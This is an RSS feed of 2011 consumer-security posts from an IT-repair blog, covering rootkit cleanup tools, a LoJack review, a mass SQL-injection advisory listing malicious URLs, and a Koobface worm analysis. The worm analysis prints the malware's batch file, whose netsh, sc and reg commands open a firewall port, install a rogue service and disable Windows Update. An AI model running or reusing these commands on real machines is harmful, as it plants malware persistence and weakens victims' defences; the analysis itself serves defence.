<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>The Weekly Geek &#187; Security</title>
	<atom:link href="http://www.theweeklygeek.com/category/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.theweeklygeek.com</link>
	<description>I'm the Geek so you don't have to be!</description>
	<lastBuildDate>Mon, 05 Dec 2011 17:26:02 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Rootkit and malware cleanup</title>
		<link>http://www.theweeklygeek.com/2011/12/03/rootkit-and-malware-cleanup/</link>
		<comments>http://www.theweeklygeek.com/2011/12/03/rootkit-and-malware-cleanup/#comments</comments>
		<pubDate>Sat, 03 Dec 2011 19:10:10 +0000</pubDate>
		<dc:creator>Kent</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Trojans]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://www.theweeklygeek.com/?p=657</guid>
		<description><![CDATA[Kent will be on &#8220;The Gun Show&#8221; with Matt Canovi (KSGF 104.1 &#8211; Springfield) this Sunday (December 5th 2011) between 3:00 and 4:00, he will speaking about this topic and personal security with your technology. The show will also be avaliable as a podcast on Monday. You can listen via your computer at http://www.ksgf.com/listenlive Lately we at IFix [...]]]></description>
			<content:encoded><![CDATA[<p>Kent will be on &#8220;The Gun Show&#8221; with<a title="Matt Canovi" href="http://mattcanovi.com" target="_blank"> Matt Canovi </a>(KSGF 104.1 &#8211; Springfield) this Sunday (December 5th 2011) between 3:00 and 4:00, he will speaking about this topic and personal security with your technology. The show will also be avaliable as a<a title="Podcast of show" href="http://www.ksgf.com/podcasts/thegunshow" target="_blank"> podcast on Monday</a>. You can listen via your computer at <a href="http://www.ksgf.com/listenlive">http://www.ksgf.com/listenlive</a></p>
<p>Lately we at <a title="IFix Computers Inc" href="http://ifixcomp.com" target="_blank">IFix Computers </a>have been dealing with more rootkit infections than normal. These internet nastiness are much more difficult to cleanup and cause a lot of havoc for the user and their networks.</p>
<p>Rootkits, worms, viruses, Trojans are all different forms of infections and can get on your computer in various ways. Gone are the days of you purposefully needing to download an infected program or open a link in an email. Today’s infections have been called &#8220;drive-by downloads&#8221; and quite often come from infected websites that you have legitimate reason to be there. The infections are called SQL injections and they have infected PBS, Intel as well as thousands of smaller web sites. The fix for the webmasters is easy and in the case of the big boys mentioned above they were repaired in a matter of hours.<span id="more-657"></span><br />
In an article from January 2010 titled &#8220;<a href="http://www.theweeklygeek.com/2010/01/04/scareware-continues-to-rise-reaching-150-million/" target="_blank">Scareware continues to rise reaching $150 Million</a>&#8220; we went over how to cleanup from an infection and some basic prevention measures. It is my desire to get an updated article out on prevention next week, but right now too many people are dealing with already being infected.</p>
<p>In an attempt to help you after a suspected infection, I went to the ever trusty Mike Rosmis and asked him for a list of what he uses and why. Before you think &#8220;but I have an anti-virus program&#8221; remember infections occur in different ways, getting a flu shot does not prevent the common cold, diverticulitis or cancer, they occur for different reasons, that is why preventive security is so essential.</p>
<p>Mike has been diligent about finding the best ways to clean up infected computers and has done some tracing of where the main attacks or source of these root-kits are coming from, it appears to be China, though that could be a slight of hand done by the coders of the most recent wave of infections.</p>
<p><strong><span style="color: #ff0000;">DANGER WILL ROBINSON – Mike properly warned me to warn you, we are professionals and know the limits and quirks and “got-yas” of these programs, you CAN really screw up your entire computer if something goes awry. If you can afford it, have a professional IT company do this work, at <a title="IFix Computers Inc" href="http://ifixcomp.com" target="_blank">IFix Computers </a>we currently charge between $150 and $200 to do the work described below.</span></strong></p>
<p>From Mike &#8211; Here&#8217;s a list of my current A/V tools:<br />
1.<a title="Kaspersky TDSSKiller" href="http://support.kaspersky.com/faq/?qid=208283363" target="_blank"> TDSSkiller &#8211; from Kaspersky</a>.  It scans system32 files and the MBR.  Good to start with this because it&#8217;s effective and usually takes no more than 30 seconds to run, even if it finds a rootkit.  It primarily scans for and removes TDSS, TDL3, Alurion, and others.  Symptoms of a rootkit are browser redirection, large quantities of junk files &amp; folders.</p>
<p>2. MBRfix &#8211; found on the <a title="Mini PE" href="http://thepiratebay.org/torrent/4717668/" target="_blank">Mini P.E. CD</a>.  It rewrites the MBR with a generic XP boot sector.  More complicated and time consuming than TDSSkiller, but effective when Windows just won&#8217;t cooperate.  It is also useful if TDSSkiller or Combofix hose up your boot sector.<br />
Kent&#8217;s note: we only use this on Windows XP machines, not for Vista or Windows 7. If someone has built or knows of a Mini PE for Vista and 7, we would love to know about it.</p>
<p>3.<a title="Combofix" href="http://www.bleepingcomputer.com/combofix/how-to-use-combofix" target="_blank"> Combofix </a>- The Big Daddy.  Checks for rootkit activity; steps through Windows startup looking for odd behavior; scans system files, replacing infected files with known good files.  Allow at least 20 minutes to run. This program is known to be updated several times a day so be sure to get the latest updates.  <span style="text-decoration: underline;"><strong>Always get a fresh copy</strong></span>.<br />
Kent&#8217;s note: this program needs to be run directly from the desktop, not a USB drive or from another folder. I also prefer to run it while the computer is booted into &#8220;Safe Mode&#8221; first and then again at the regular desktop.</p>
<p>4.<a title="Autoruns by Microsoft" href="http://technet.microsoft.com/en-us/sysinternals/bb963902" target="_blank"> Autoruns </a>- Use this if you can&#8217;t get to the desktop in Normal Mode and can get to Safe Mode.  It allows you to stop things like &#8216;hsuebvbhjsg.exe&#8217; from starting up.</p>
<p>5.<a href="http://www.safer-networking.org/en/index.html" target="_blank"> Spybot Search &amp; Destroy</a> &#8211; a good malware scanner, provides passive browser protection through a manually updated hosts file, shows you which BHO&#8217;s (Browser Help Objects) and ActiveX&#8217;s are installed, has a process explorer and an alternative registry cleaner. Allow 20 minutes for the scanner.  You have to manually tell it to fix what it finds.<br />
Kent&#8217;s note: You should right-click on the icon and choose &#8220;Run as Administrator&#8221; in Vista and I do the same in Windows 7. Also you want to use the &#8220;Immunize&#8221; and (when in the Advanced Mode) under the &#8220;Tools&#8221; section go through the &#8220;ActiveX&#8221;, &#8220;BHOs&#8221;, and load the &#8220;Host File&#8221;.</p>
<p>6.<a title="Malwarebytes" href="http://www.malwarebytes.org/" target="_blank"> MalwareBytes </a>- good, simple malware scanner for civilians.  Update it and run it.  You also have to manually tell it to fix what it finds.  Allow an hour-and-a-half to run for the full scan.<br />
Kent&#8217;s note: Under the &#8220;Settings&#8221; tab, be sure &#8220;Terminate Internet Explorer during threat removal&#8221; is selected.</p>
<p>7.<a title="ESET Anti-virus" href="http://eset.com" target="_blank"> ESET anti-virus </a>- When properly configured, this program blocks a lot of infections the others don’t. It is also very &#8220;light&#8221; on system resources allowing you more horsepower to do what you need to on the computer. It cleanups op a lot of crud and can be run in safe mode as a command line tool (don’t be afraid, just run it and it automatically goes to the command line and does what is needed). If you are infected, I would run this in &#8220;Safe Mode&#8221; after running Combofix.</p>
<p>Well that is it, will this clean all infections? &#8220;No&#8221;, did we give you every step in configuring these programs? &#8220;No&#8221;. However, we have given you the tools do clean up your computer as best we can in this short space.</p>
<p>Until we meet again, have a virus (and root-kit) free week.</p>
<p>&nbsp;</p>
<div class="al2fb_likers"><a href="http://www.facebook.com/profile.php?id=1422996440" rel="nofollow">Richard Vogt</a> <span class="al2fb_liked">liked this post</span></div><div class="al2fb_like_button"><div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#appId=206022902743493&amp;xfbml=1" type="text/javascript"></script>
<fb:like href="http://www.theweeklygeek.com/2011/12/03/rootkit-and-malware-cleanup/" layout="button_count" show_faces="true" width="450" action="like" font="arial" colorscheme="light" ref="AL2FB"></fb:like></div>]]></content:encoded>
			<wfw:commentRss>http://www.theweeklygeek.com/2011/12/03/rootkit-and-malware-cleanup/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>LoJack computer tracing and security software</title>
		<link>http://www.theweeklygeek.com/2011/05/11/lojack-computer-tracing-and-security-software/</link>
		<comments>http://www.theweeklygeek.com/2011/05/11/lojack-computer-tracing-and-security-software/#comments</comments>
		<pubDate>Wed, 11 May 2011 16:16:38 +0000</pubDate>
		<dc:creator>Kent</dc:creator>
				<category><![CDATA[Backing up]]></category>
		<category><![CDATA[Hardware]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.theweeklygeek.com/?p=570</guid>
		<description><![CDATA[Recently one of our customers had a break in and all the laptops stolen, about 10 days later, the crooks returned and did the same thing. Within two weeks the local news had a story about the number of break-ins in this little town. Unfortunately the client had purchased big box store laptops both times [...]]]></description>
			<content:encoded><![CDATA[<p>Recently one of our customers had a break in and all the laptops stolen, about 10 days later, the crooks returned and did the same thing. Within two weeks the local news had a story about the number of break-ins in this little town.<span id="more-570"></span></p>
<p>Unfortunately the client had purchased big box store laptops both times instead of from a local professional company such as IFix Computers. Why? Because they were “cheaper”. Just a quick reminder, there is a reason that small independent IT companies charge more, quality is the biggest reason (unless they are just name brand resellers and not actual builders). There are other reasons such as service and the purpose of this article, theft recovery.</p>
<p>There are several parts of theft recovery and data security. Intel provides a couple of options, one is TPM (Trusted Platform Module) which you can read about here <a href="http://www.intel.com/design/mobile/platform/downloads/trusted_platform_module_white_paper.pdf">http://www.intel.com/design/mobile/platform/downloads/trusted_platform_module_white_paper.pdf</a><br />
TPM, in part, provides the layout for laptop security. Included in quality laptops and computers are the Intel VPro chips, they provide the ability for remote access and better yet, tracking of the hardware (desktop PC or laptop) <a href="http://www.intel.com/technology/vpro/index.htm">http://www.intel.com/technology/vpro/index.htm</a>. Combined these are a powerful tools for managing, remote work and locating computers. For them to be easily used software is added, one such software program is <a title="LoJack" href="http://www.theweeklygeek.com/wp-admin/%3Ca%20href=%22http://send.onenetworkdirect.net/z/328683/rn_a60942/%22%3ELearn%20More!%3C/a%3E" target="_blank">LoJack by Absolute Software</a>.</p>
<p>Since not all computers have this technology (or similar) built in, 3rd party software programs have also been created to duplicate this process. After researching several programs I narrowed my tests down to<a title="LoJack" href="http://send.onenetworkdirect.net/z/328683/rn_a60942/" target="_blank"> Absolute Software’s LoJack</a>. It works alone or in conjunction with laptops setup with TPM and VPro (which I highly recommend).</p>
<p>Let’s get to the meat of this article, after installing LoJack on my personal laptop and giving it a kick for 45 days, I figure I should report my basic results back to you.</p>
<p>First I want you to know, the software did not affect my laptops performance. It did not slow down standard operations (email, spreadsheets…) or internet usage. It has occasionally popped up a reminder that the software is on my laptop and included a one sentence recovery story, no big deal, it goes right away.</p>
<p>There are two versions of LoJack, the “<a title="Standard" href="http://send.onenetworkdirect.net/z/328682/rn_a60942/" target="_blank">Standard</a>” and “<a title="Premium" href="http://send.onenetworkdirect.net/z/328683/rn_a60942/" target="_blank">Premium</a>”, the latter adds a $1,000 guarantee plus better tracking. According to the Absolute Software web site, “If we don&#8217;t recover your stolen computer or enable the Data Delete service, you could be eligible for a Service Guarantee payment of up to $1000”. The difference in price is $39.99 for 1 year of the <a title="Standard" href="http://send.onenetworkdirect.net/z/328682/rn_a60942/" target="_blank">Standard </a>and $59.99 for the <a title="Premium" href="http://send.onenetworkdirect.net/z/328683/rn_a60942/" target="_blank">Premium </a>version. Three year subscriptions are available for $89.99 and 109.99 respectively, not a bad price for the services offered.</p>
<p>So what services are included you ask. I am glad you did. First and the most important in my opinion is the theft recovery, after all most of us who use laptops have our life on them. A great backup system will provide for the loss of data or even a complete system restore, but somehow our laptops become part of us. If you don’t believe it, just leave yours at home during a business day and see how you react, enough said. An advantage of<a title="LoJack" href="http://send.onenetworkdirect.net/z/328682/rn_a60942/" target="_blank"> LoJack </a>is this is not a program you install and you track if lost or stolen (though you can log on to your account and track where the laptop has been). Absolute Software works with the police in recovering your laptop, one less worry or stressor in your life.</p>
<p>Another part of the<a title="LoJack" href="http://send.onenetworkdirect.net/z/328682/rn_a60942/" target="_blank"> LoJack </a>program is what they term as “Data &amp; Device Security”. This is Absolute software’s “Data Delete” portion. You use the Data Delete program to erase your information remotely. This keeps thieves out of your e-mail, personal documents and programs (such as your accounting software). If you don’t want to erase your computer, you can also prevent access to your computer by freezing it remotely and adding a pop up message on the screen telling the crooks you did so. I would not recommend this, you just gave away the chance of catching the thieves, once alerted they will ditch the laptop or destroy it and then ditch it.</p>
<p>The third part of LoJack is the ability to locate a missing laptop. The <a title="Standard" href="http://send.onenetworkdirect.net/z/328682/rn_a60942/" target="_blank">Standard </a>version falls short here, it only shows IP address locations. This is a Generic “Springfield, Missouri” type location on a map, effective only if you travel a large area, not so great if you stay local. Plus it is not a big help to the police, they don’t have time to do all the work required narrowing down an IP location. The <a title="Premium" href="http://send.onenetworkdirect.net/z/328683/rn_a60942/" target="_blank">Premium </a>version is supposed to give QPS to the exact location of the laptop on a map. Unfortunately I only tried the Standard version so I cannot report how well this works.</p>
<p>With either version you get to create an account on the Absolute Software web site where you can update your information, track the laptop, enable the protection services, by filing a missing laptop claim.</p>
<p>My take, LoJack is worth the expense. For such a small price you don’t need to replace a laptop, restore the data and feel violated, as you would otherwise would. It is easy to use, does not eat up system resources and is part of good plan for your data protection. Part of a plan you ask, yes, remember to backup your data, have surge protection, and have proper security, all things we have discusses here.</p>
<p>Until we meet again, have a virus free week!</p>
<div class="al2fb_like_button"><div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#appId=206022902743493&amp;xfbml=1" type="text/javascript"></script>
<fb:like href="http://www.theweeklygeek.com/2011/05/11/lojack-computer-tracing-and-security-software/" layout="button_count" show_faces="true" width="450" action="like" font="arial" colorscheme="light" ref="AL2FB"></fb:like></div>]]></content:encoded>
			<wfw:commentRss>http://www.theweeklygeek.com/2011/05/11/lojack-computer-tracing-and-security-software/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mass SQL Injection leads to more Fake AV scares</title>
		<link>http://www.theweeklygeek.com/2011/05/02/mass-sql-injection-leads-to-more-fake-av-scares/</link>
		<comments>http://www.theweeklygeek.com/2011/05/02/mass-sql-injection-leads-to-more-fake-av-scares/#comments</comments>
		<pubDate>Mon, 02 May 2011 23:14:38 +0000</pubDate>
		<dc:creator>Kent</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Virus]]></category>
		<category><![CDATA[Worms]]></category>

		<guid isPermaLink="false">http://www.theweeklygeek.com/?p=564</guid>
		<description><![CDATA[Here we go again, the Fake AV criminals have come up with a new attack, the SonicWALL research team has received reports of a mass SQL injection infecting millions of websites. It is likely that the back-end databases of these websites were compromised leading to this SQL injection. Malicious script codes were inserted and being served [...]]]></description>
			<content:encoded><![CDATA[<p>Here we go again, the Fake AV criminals have come up with a new attack, the SonicWALL research team has received reports of a mass SQL injection infecting millions of websites. It is likely that the back-end databases of these websites were compromised leading to this SQL injection.</p>
<p>Malicious script codes were inserted and being served in webpages which when triggered redirects to malicious links that serves FakeAV malware.<span id="more-564"></span></p>
<p><a href="http://www.theweeklygeek.com/wp-content/uploads/2011/05/FakeAV.jpg"><img class="aligncenter size-full wp-image-566" title="FakeAV" src="http://www.theweeklygeek.com/wp-content/uploads/2011/05/FakeAV.jpg" alt="" width="257" height="174" /></a></p>
<p>The following are some of the reported Malicious URLs inserted on compromised webpages:<br />
• alexblane(dot)com/ur.php<br />
• alisa-carter(dot)com/ur.php<br />
• books-loader(dot)info/ur.php<br />
• lizamoon(dot)com/ur.php<br />
• milapop(dot)com/ur.php<br />
• t6ryt56(dot)info/ur.php<br />
• tadygus(dot)com/ur.php<br />
• Worid-of-books(dot)com/ur.php<br />
All of these URLs resolve to single IP:   91.213.29.182<br />
SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:<br />
• GAV: ScrInject.UR (Trojan)<br />
• GAV: Suspicious#asprotect (Trojan)</p>
<p>If you don&#8217;t have a SonicWALL with the Gateway AntiVirus (or Comprehensive Security Suite), it is just a matter of time until this pops up on your network. Be prepared or better yet, contact IFix Computers for a SonicWALL that will protect your network.</p>
<p>Until we meet again, have a Fake AV free week!</p>
<div class="al2fb_like_button"><div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#appId=206022902743493&amp;xfbml=1" type="text/javascript"></script>
<fb:like href="http://www.theweeklygeek.com/2011/05/02/mass-sql-injection-leads-to-more-fake-av-scares/" layout="button_count" show_faces="true" width="450" action="like" font="arial" colorscheme="light" ref="AL2FB"></fb:like></div>]]></content:encoded>
			<wfw:commentRss>http://www.theweeklygeek.com/2011/05/02/mass-sql-injection-leads-to-more-fake-av-scares/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Facebook Security</title>
		<link>http://www.theweeklygeek.com/2011/03/10/facebook-security/</link>
		<comments>http://www.theweeklygeek.com/2011/03/10/facebook-security/#comments</comments>
		<pubDate>Fri, 11 Mar 2011 00:04:49 +0000</pubDate>
		<dc:creator>Kent</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.theweeklygeek.com/?p=555</guid>
		<description><![CDATA[Several years ago I wrote but did not publish an &#8220;How to&#8221; on My Space security. About 3 months ago I began one on Facebook security. It turns out that others have written excellent articles with great screenshots on exactly what to do. Instead of repeating what they did I will put the PDF files [...]]]></description>
			<content:encoded><![CDATA[<p>Several years ago I wrote but did not publish an &#8220;How to&#8221; on My Space security. About 3 months ago I began one on Facebook security. It turns out that others have written excellent articles with great screenshots on exactly what to do. Instead of repeating what they did I will put the PDF files on line here for you.</p>
<p><a title="Modify Facebook Places" href="http://www.ifixcomp.com/places.pdf" target="_blank">Modify your FaceBook places</a></p>
<p><a title="Facebook Privacy Settings" href="http://www.ifixcomp.com/Privacy.pdf" target="_blank">Privacy Settings &#8211; by the U.S. Navy</a></p>
<p>Download them, print them and pass them along.</p>
<p>Until we meet again, have a virus free week.</p>
<div class="al2fb_like_button"><div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#appId=206022902743493&amp;xfbml=1" type="text/javascript"></script>
<fb:like href="http://www.theweeklygeek.com/2011/03/10/facebook-security/" layout="button_count" show_faces="true" width="450" action="like" font="arial" colorscheme="light" ref="AL2FB"></fb:like></div>]]></content:encoded>
			<wfw:commentRss>http://www.theweeklygeek.com/2011/03/10/facebook-security/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Koobface.HJV &#8211; Spreading in the wild via FACEBOOK</title>
		<link>http://www.theweeklygeek.com/2011/02/28/koobface-hjv-spreading-in-the-wild-via-facebook/</link>
		<comments>http://www.theweeklygeek.com/2011/02/28/koobface-hjv-spreading-in-the-wild-via-facebook/#comments</comments>
		<pubDate>Tue, 01 Mar 2011 00:08:46 +0000</pubDate>
		<dc:creator>Kent</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Trojans]]></category>
		<category><![CDATA[Virus]]></category>
		<category><![CDATA[Worms]]></category>

		<guid isPermaLink="false">http://www.theweeklygeek.com/?p=532</guid>
		<description><![CDATA[Well, last week I finally started a FaceBook account, today I find out about this, though it is no big surprise and why I try very hard to be careful when using a computer period. Sonicwall Research team has discovered a new malicious Worm spreading in the wild. The Worm spreads via Facebook profiles and [...]]]></description>
			<content:encoded><![CDATA[<p>Well, last week I finally started a FaceBook account, today I find out about this, though it is no big surprise and why I try very hard to be careful when using a computer period.</p>
<p>Sonicwall Research team has discovered a new malicious Worm spreading in the wild. The Worm spreads via <strong>Facebook </strong>profiles and as part of its post-infection activity, it installs Fake AVG antivirus security software.</p>
<p>Upon installation the Worm informs the user that it needs to perform a &#8220;Scan&#8221; of the system:</p>
<p><a href="http://www.theweeklygeek.com/wp-content/uploads/2011/02/koobface_HJV_feb04_1.png"><img class="aligncenter size-full wp-image-533" title="koobface_HJV_feb04_1" src="http://www.theweeklygeek.com/wp-content/uploads/2011/02/koobface_HJV_feb04_1.png" alt="" width="243" height="129" /></a></p>
<p><span id="more-532"></span>It performs a fake system scan which is hosted on a Fake AV web page:</p>
<p><a href="http://www.theweeklygeek.com/wp-content/uploads/2011/02/koobface_HJV_feb04_4.png"><img class="aligncenter size-medium wp-image-534" title="koobface_HJV_feb04_4" src="http://www.theweeklygeek.com/wp-content/uploads/2011/02/koobface_HJV_feb04_4-300x215.png" alt="" width="300" height="215" /></a> <br />
 <a href="http://www.theweeklygeek.com/wp-content/uploads/2011/02/koobface_HJV_feb04_2.png"><img class="aligncenter size-medium wp-image-536" title="koobface_HJV_feb04_2" src="http://www.theweeklygeek.com/wp-content/uploads/2011/02/koobface_HJV_feb04_2-300x237.png" alt="" width="300" height="237" /></a><a href="http://www.theweeklygeek.com/wp-content/uploads/2011/02/koobface_HJV_feb04_4.png"></a></p>
<p>When clicking on &#8220;Remove all&#8221; or &#8220;Cancel&#8221; it attemps to initiate the download of:</p>
<p>•bitav_2053_ext6.exe [Detected as TDSS.ABCR (Trojan)]</p>
<p><a href="http://www.theweeklygeek.com/wp-content/uploads/2011/02/koobface_HJV_feb04_3.png"><img class="aligncenter size-medium wp-image-537" title="koobface_HJV_feb04_3" src="http://www.theweeklygeek.com/wp-content/uploads/2011/02/koobface_HJV_feb04_3-300x201.png" alt="" width="300" height="201" /></a><br />
The worm will periodically cause pop-up messages such as in the screenshot below:</p>
<p><a href="http://www.theweeklygeek.com/wp-content/uploads/2011/02/koobface_HJV_feb04_5.png"><img class="aligncenter size-medium wp-image-539" title="koobface_HJV_feb04_5" src="http://www.theweeklygeek.com/wp-content/uploads/2011/02/koobface_HJV_feb04_5-300x60.png" alt="" width="300" height="60" /></a><br />
When clicking OK to such pop-up messages the Worm will bring up further Fake AV pages which attempt to download more malware to the infected machine such as: pack.exe [Detected as SecurityTool.W (Trojan)]</p>
<p>Make sure your AntiVirus provides protection against this threat via the following signatures:</p>
<p>Koobface.HJV (Worm)<br />
Koobface.HJV_2 (Worm)<br />
Koobface.HJV_3 (Worm)<br />
Koobface.FF (Trojan)<br />
Delf.EM (Trojan)<br />
TDSS.ABCR (Trojan)<br />
SecurityTool.W (Trojan)</p>
<p>So if you see this happening, get off the internet, reboot your PC and run a complete system series of scans. <a title="Scareware" href="http://www.theweeklygeek.com/2010/01/04/scareware-continues-to-rise-reaching-150-million/" target="_blank">Check out our past article on how to remove this type of infection.</a></p>
<p>﻿Here is some more technical jargon about it for those wishing to geek into it.</p>
<p>The Worm performs the following DNS queries:</p>
<p>•www.google.com<br />
•facebook.com<br />
•www.facebook.com<br />
•d.static.ak.fbcdn.net<br />
•x-treme-radio.host22.com<br />
•www.ashiww.com<br />
•www.wahdohotel.nl<br />
•kingswoodwright.com<br />
•kbfgb.greyzzsecure9.com<br />
•3064972.greyzzsecure9.com<br />
The Worm attempts to load various web pages using random page names with the .css extension:<br />
•http://206.160.{removed}.9/rsrc.php/yW/r/Xx2bs9YPnF_.css<br />
•http://206.160.{removed}.9/rsrc.php/ye/r/vOYlUxHAn95.css<br />
•http://206.160.{removed}.9/rsrc.php/yS/r/w4doJXgUPVR.css<br />
•http://206.160.{removed}.43/rsrc.php/yX/r/pWROpoRFF42.css<br />
•http://206.160.{removed}.9/rsrc.php/y4/r/LIj01FurENH.css<br />
•http://206.160.{removed}.9/rsrc.php/yE/r/4Kozs88a56s.css<br />
•http://206.160.{removed}.43/rsrc.php/yQ/r/dvBK5Hfjbcc.css<br />
•http://206.160.{removed}.43/rsrc.php/y-/r/Ki5kfy7_Bje.css<br />
•http://206.160.{removed}.9/rsrc.php/yL/r/u8Bue217GRs.css<br />
•http://206.160.{removed}.9/rsrc.php/yW/r/Xx2bs9YPnF_.css<br />
The Worm installs the following files on the system:</p>
<p>•C:\Documents and Settings\{USER}\Local Settings\Temp\feb.bat<br />
•C:\Documents and Settings\{USER}\Local Settings\Temp\zpskon_1296703528.exe [Detected as GAV: Koobface.FF (Trojan)]<br />
•C:\Documents and Settings\{USER}\Local Settings\Temp\zpskon_1296699165.exe [Detected as GAV: Delf.EM (Trojan)]<br />
•C:\WINDOWS\5456456z<br />
•C:\WINDOWS\bt7.dat<br />
•C:\WINDOWS\jjp156.exe [Detected as GAV: Koobface.HJV_2 (Worm)]<br />
•C:\WINDOWS\system32\feb.dll [Detected as GAV: Koobface.HJV_3 (Worm)]<br />
•C:\WINDOWS\system32\drivers\feb.sys [Detected as GAV: Koobface.FF (Trojan)]<br />
feb.bat contains:<br />
netsh firewall add allowedprogram name=&#8221;feb&#8221; program=&#8221;C:\WINDOWS\system32\svchost.exe&#8221; mode=enable<br />
netsh firewall add portopening tcp 8087 feb enable<br />
sc create &#8220;ffeb&#8221; type= interact type= share start= auto binpath= &#8220;C:\WINDOWS\system32\svchost.exe -k ffeb&#8221;<br />
reg add &#8220;hklm\system\currentcontrolset\services\ffeb\parameters&#8221; /v servicedll /t reg_expand_sz /d &#8220;C:\WINDOWS\system32\feb.dll&#8221; /f<br />
reg add &#8220;hklm\system\currentcontrolset\services\ffeb&#8221; /v failureactions /t reg_binary /d 00000000000000000000000003000000140000000100000060ea00000100000060ea00000100000060ea0000 /f<br />
reg add &#8220;hklm\software\microsoft\windows nt\currentversion\svchost&#8221; /v ffeb /t reg_multi_sz /d &#8220;ffeb\0&#8243; /f<br />
sc start ffeb<br />
feb.dll contains a list or URL&#8217;s all of which are either taken down or lead to blank pages at the time of writing. Below is a sample of the URL&#8217;s contained feb.dll:<br />
•impri{removed}.gr/.lhinrs/<br />
•hk{removed}.org/.ycguh3/<br />
•roomservi{removed}.com.au/.9mov05w/<br />
•nubs.wo{removed}.co.uk/.7txq/<br />
•lenga{removed}.com/.ck5rg8/<br />
•cayenneo{removed}.com/.fplf/<br />
•www.dead{removed}.co.uk/.qe9v/<br />
•ib{removed}.org.il/.5cei7f9/<br />
•www.kurdist{removed}.com/.x5fyik/<br />
•heali{removed}.co.za/.12vatd/<br />
•forwardmar{removed}.org/.6sta03t/<br />
•numerus-{removed}.fr/.li81/<br />
•fino{removed}.com/.ea2cuwa/<br />
•fe{removed}.co.za/.jts51/<br />
•tarr{removed}.com/.5fu3/<br />
•toppla{removed}.nl/.vfnc/<br />
•www.fishingfo{removed}.com/.5wmm9/<br />
The worm installs the following registry keys to ensure startup of jjp156.exe and the feb.sys driver:<br />
•HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer NoAutoUpdate dword:00000001<br />
•HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer NoWindowsUpdate dword:00000001<br />
•HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost ffeb hex(7):66,66,65,62,00,00,<br />
•HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dfg49df &#8220;c:\windows\jjp156.exe&#8221;<br />
•HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FEB NextInstance dword:00000001<br />
•HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FEB\0000 Service &#8220;feb&#8221;<br />
•HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\feb ImagePath hex(2):&#8221;\??\C:\WINDOWS\system32\drivers\feb.sys&#8221;</p>
<div class="al2fb_like_button"><div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#appId=206022902743493&amp;xfbml=1" type="text/javascript"></script>
<fb:like href="http://www.theweeklygeek.com/2011/02/28/koobface-hjv-spreading-in-the-wild-via-facebook/" layout="button_count" show_faces="true" width="450" action="like" font="arial" colorscheme="light" ref="AL2FB"></fb:like></div>]]></content:encoded>
			<wfw:commentRss>http://www.theweeklygeek.com/2011/02/28/koobface-hjv-spreading-in-the-wild-via-facebook/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

